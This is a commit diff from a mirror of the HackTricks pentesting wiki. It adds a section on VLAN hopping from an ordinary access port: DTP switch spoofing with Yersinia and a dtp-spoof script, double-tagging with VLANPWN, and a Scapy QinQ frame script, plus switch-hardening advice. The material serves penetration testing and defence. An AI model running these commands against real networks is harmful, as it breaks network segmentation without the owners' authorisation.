maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1149 from HackTricks-wiki/research_update_src_generic-methodologies-and-resources_pentesting-network_lateral-vlan-segmentation-bypass_20250718_014054

Browse Source 
Research Update Enhanced src/generic-methodologies-and-resou...
This commit is contained in:
SirBroccoli 2025-07-18 20:01:43 +02:00 committed by GitHub
commit 0b32458cbe
1 changed files with 76 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
View File

@ -60,11 +60,84 @@ Connectivity is tested by initiating ICMP requests to the default gateways for V
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
---
## Other VLAN-Hopping Techniques (no privileged switch CLI)
The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a **regular access port**. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:
### 1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)
Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single **DTP “desirable”** or **“trunk”** frame converts the access port into an 802.1Q trunk that carries *all* allowed VLANs.
*Yersinia* and several PoCs automate the process:
```bash
# Become a trunk using Yersinia (GUI)
$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking
# Python PoC (dtp-spoof)
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*:
```bash
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up
```
### 2. Double-Tagging (Native-VLAN Abuse)
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection:
```bash
python3 DoubleTagging.py \
--interface eth0 \
--nativevlan 1 \
--targetvlan 20 \
--victim 10.10.20.24 \
--attacker 10.10.1.54
```
Packet walk-through:
1. Outer tag (1) is stripped by the first switch because it matches the native VLAN.
2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .
### 3. QinQ (802.1ad) Stacking
Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:
```python
from scapy.all import *
outer = 100 # Service tag
inner = 30 # Customer / target VLAN
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")
```
---
## Defensive Recommendations
1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`.
3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
---
## References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
- VLANPWN attack toolkit <https://github.com/casterbytethrowback/VLANPWN>
- Twingate "What is VLAN Hopping?" (Aug 2024) <https://www.twingate.com/blog/glossary/vlan%20hopping>
{{#include ../../banners/hacktricks-training.md}}